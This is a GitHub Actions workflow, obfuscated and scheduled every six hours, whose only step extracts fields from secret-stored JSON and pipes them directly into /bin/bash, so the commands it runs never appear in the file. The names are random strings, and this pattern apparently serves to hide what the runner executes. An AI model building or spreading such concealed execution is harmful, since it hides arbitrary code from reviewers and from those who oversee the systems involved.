name: zhuanxiagjiaozhou

on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuanxiagjiaozhou
        env:
          mf06680: ${{ secrets.mf06680 }}
        run: |
          echo $mf06680 | jq -r .ntpc32168 | /bin/bash
          echo $jw724 | jq -r .fgvre25683 | /bin/bash
          echo $ddy704 | jq -r .ewcn0 | /bin/bash
          echo $qdcg92919 | jq -r .nvp7250 | /bin/bash
          echo $fww7925 | jq -r .zoze34282 | /bin/bash
          echo $aaigh065 | jq -r .opusp94481 | /bin/bash
          echo $osfym338 | jq -r .mker50814 | /bin/bash
          echo $jeiy08 | jq -r .jx13 | /bin/bash
          echo $dabab452 | jq -r .ou57432 | /bin/bash
          echo $fd6673 | jq -r .rq76 | /bin/bash
          echo $zo5 | jq -r .mu1 | /bin/bash

